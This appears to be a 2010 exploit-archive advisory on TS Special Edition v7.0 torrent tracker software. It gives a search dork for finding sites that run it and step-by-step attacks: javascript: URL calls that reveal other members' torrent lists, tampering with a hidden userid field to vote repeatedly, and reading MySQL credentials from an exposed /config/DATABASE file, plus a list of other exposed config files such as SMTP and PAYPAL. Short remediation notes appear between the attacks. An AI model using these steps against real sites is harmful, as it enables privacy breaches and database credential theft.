TS Special Edition <= v.7.0 Multiple Vulnerabilities
Posted on 18 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>TS Special Edition <= v.7.0 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== TS Special Edition <= v.7.0 Multiple Vulnerabilities ==================================================== ############################################################################################## # # TS Special Edition <= v.7.0 Multiple Vulnerabilities # Dork: "Powered by TS Special Edition" # Site: http://templateshares.net # Download: http://templateshares.net/special/purchase # # Author: IHTeam # ############################################################################################## # # See any seed/leech files of any users # # 1) Open any user details page you want (Ex: /userdetails.php?id=1) # 2) Paste one of the following into the URL bar: # 2.1) javascript:TSAjaxRequest('showuploaded'); <---- See Uploaded Torrent # 2.2) javascript:TSAjaxRequest('showcompleted'); <---- See Completed Torrent # 2.3) javascript:TSAjaxRequest('showleechs'); <---- See In Leech Torrents # 2.4) javascript:TSAjaxRequest('showseeds'); <---- See In Seed Torrents # 2.5) javascript:TSAjaxRequest('showsnatches'); <---- See Recently Downloaded # # Note (inferred from the steps above): these requests appear to return another member's lists without a server-side permission check; the check belongs on the server, for each of the five actions, not in the page's links. # ############################################################################################## # # Bypass Vote System # # 1) Open any torrent file detail page (Ex: /details.php?id=1) # 2) Edit HTML Source code with FireBug or Opera # 3) Search 'form id="quickrate"' and edit the following: # 3.1) &lt;input type="hidden" value="CHANGE_YOUR_ID_HERE" name="userid"&gt; # 3.2) javascript:TSQuickRate('torrent_1', 'CHANGE_YOUR_ID_HERE'); # 4) Apply changes and vote on the torrent as often as you want # # Note (inferred from the steps above): the vote appears to be recorded under the userid sent by the browser; the server should take the voter's id from the logged-in session and ignore the form field. # 
############################################################################################## # # MySQL Credentials # # You can see the MySQL credentials by opening /config/DATABASE # # Ex: www.mysite.com/config/DATABASE # a:4:{s:10:"mysql_host";s:9:"HOSTNAME_OF_MYSQL_DATABASE";s:10:"mysql_user";s:11:"USERNAME_OF_MYSQL" # ;s:10:"mysql_pass";s:10:"PASSWORD_OF_MYSQL";s:8:"mysql_db";s:21:"DATABASE_NAME";} # # It can be fixed by adding an .htaccess file to the /config/ directory that denies all web access to it # (this only works where Apache honours .htaccess; otherwise use the web server's own deny rule or move the files out of the web root). # The database password should be changed afterwards, since it may already have been read. # ############################################################################################## # # Other configuration files # # 1) /config/WAITSLOT # 2) /config/TWEAK # 3) /config/THEME # 4) /config/STAFFTEAM # 5) /config/SMTP # 6) /config/SEO # 7) /config/SECURITY # 8) /config/REDIRECT # 9) /config/PJIRC # 10) /config/PAYPAL # 11) /config/MAIN # 12) /config/KPS # 13) /config/FORUMCP # 14) /config/EXTRA # 15) /config/DATETIME # 16) /config/CLEANUP # 17) /pjirc/pjirc.cfg # # Files 1-16 are covered by the same deny rule on /config/; 17) /pjirc/pjirc.cfg is in a different directory and needs its own rule. # ############################################################################################## # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>